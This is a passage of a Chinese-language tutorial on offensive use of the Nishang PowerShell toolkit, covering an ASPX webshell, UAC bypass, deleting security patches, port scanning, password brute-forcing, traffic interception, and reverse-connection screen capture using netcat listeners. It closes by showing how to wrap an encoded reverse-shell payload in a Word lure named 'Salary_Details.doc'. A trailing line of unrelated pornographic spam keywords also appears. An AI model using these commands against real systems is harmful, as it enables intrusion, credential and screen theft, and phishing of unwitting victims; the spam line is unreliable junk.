4.3 webshell
存放于nishangAntak-WebShell目錄下,就是一個ASPX的大馬,但是命令行是PowerShell,比單純的cmd強大很多。功能齊全,日aspx的站必備的東西。
同樣需要賬號密碼,上傳下載,無所不能。
4.4 提權
滲透過程中,這里應該是使用最多的地方了。
4.4.1 嘗試本地權限提升
Enable-DuplicateToken
這個腳本在我們具有一定權限的時候,可以幫助幫助我們獲得系統權限。
4.4.2 Bypass UAC
Invoke-PsUACme 看名字就知道是干嘛的了。繞過UAC嗎~,Nishang中給出的方法太全面了,GET-HELP來看看幫助信息。
實例一: 使用Sysprep方法和默認的Payload執行。
實例二: 使用oobe方法跟默認的payload執行。
實例三: 使用oobe方法跟自制payload執行。
這個模塊用的是UACME項目的DLL來Bypass UAC。所以,方法對照表。
這只是官方給的例子,回過頭來看一眼上面的參數信息。
-Payloadpath指定一個payload路徑
-CustomDll64
指定一個dll文件,后兩位代表系統位數。
-CustomDll32
嘗試本地Bypass UAC:
4.4.3 刪除補丁
刪除補丁,這是我見過最`厲害`的腳本,沒有之一。如此騷氣!
Remove-Update
實例一: 刪除全部補丁
實例二: 刪除全部的安全補丁
實例三: 刪除指定的補丁
這是刪除之前的補丁情況。
嘗試刪除第一個補丁。
成功刪除了第一個補丁。
4.5端口掃描,爆破
4.5.1: 端口掃描
來詳細說明下個個參數
可以使用 Get-Help Invoke-PortScan -full 查看幫助信息。
-StartAddress 開始的IP地址
-EndAddress 結束的IP地址
-ResolveHost 是否解析主機名
-ScanPort要不要進行端口掃描
-Port 要掃描的端口(默認很多,看上圖)
-TimeOut 超時時間
對我本地局域網進行掃描:
Invoke-PortScan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost
掃描中:
掃描結束:
4.5.2 弱口令爆破
Invoke-BruteForce
之前先說命令參數。
-ComputerName 對應服務的計算機名
-UserList 用戶名字典
-PasswordList 密碼字典
-Service 服務(默認為:SQL)
-StopOnSuccess 匹配一個后停止
-Delay 延遲時間
有了上面的說明,這里看到應該很清楚了。不在做過多的解釋。
4.6 嗅探
內網嗅探,動靜太大了,但是,實在沒辦法的時候,不得不說,這是一個辦法。
在靶機上執行:Invoke-Interceptor -ProxyServer 192.168.250.172 -ProxyPort 9999
監聽機器上執行:netcat -lvvp 9999
4.7 屏幕竊取
Show-TargetScreen
屏幕竊取,一樣正反向通吃
-IPAddress 后面加IP地址(反向鏈接需要)
-Port 加端口
-Bind 正向連接
反向鏈接竊取屏幕
靶機:Show-TargetScreen -Reverse -IPAddress 192.168.250.172 -Port 3333
攻擊機:netcat -nlvp 3333 | netcat -nlvp 9999
之后訪問攻擊機器的9999端口,就可以竊取到屏幕了
正向連接竊取屏幕
靶機執行:Show-TargetScreen -Bind -Port 3333
攻擊機執行:netcat -nv 192.168.250.37 3333 | netcat -lnvp 9999
之后同樣,訪問本機的9999端口,就能正常訪問了。
4.8 Client
Nishang可以生成各式各樣的客戶端。類型大概有這么多類型全都可以生成。選擇一種來說,其他的方法都是類似的。
打開nishangShellsInvoke-PowerShellTcpOneLine.ps1這個文件,復制第三行的內容?梢钥吹街虚g有一個TCPClient的參數,這里就是遠程連接的地址了。
更改這個地址和端口即可,之后進入命令行執行
Invoke-Encode -DataToEncode '你的代碼' -IsString -PostScript
執行完成之后會在當前目錄下生成兩個文件。一個是encoded.txt 另一個是encodedcommand.txt。之后執行
Out-Word -PayloadScript .encodedcommand.txt
就可以在我們當前文件夾下生成一個名為Salary_Details.doc的doc文件。之后使用nc監聽就好。說完了操作,回過頭來看看命令行參數:
-Payload 后面直接加payload,但是注意引號的閉合
-PayloadURL 傳入遠程的payload進行生成
-PayloadScript 指定本地的腳本進行生成
-Arguments 之后加要執行的函數。(payload之中有的函數)
-OutputFile 輸出的文件名
-WordFileDir 輸出的目錄地址
-Recurse 在WordFileDir中遞歸尋找Word文件
-RemoveDocx 創建完成后刪除掉原始的文件
5.總結
看完之后肯定一臉懵逼,這都是啥。這么復雜的語法,沒辦法,針對PowerShell的工具語法相對而言都比較復雜。而且,并沒有講解nishang的后門模塊,個人覺得不是那么好用。還有一些反彈技巧并沒有詳細介紹,比如說什么DNS反彈,ICMP反彈,WMI反彈。
有興趣的朋友可以自行研究,每一款工具針對不同的環境都能給我們帶來意想不到的效果。不用歸不用,但是到萬不得已用的時候,才是最惡心的,藝多不壓身嘛~
本文內容不用于商業目的,如涉及知識產權問題,請權利人聯系51Testing小編(021-64471599-8017),我們將立即處理
明星乱亚洲合成图com|国产真实破苞视|日本a级不打码按摩片|一本通中文字幕亚洲欧美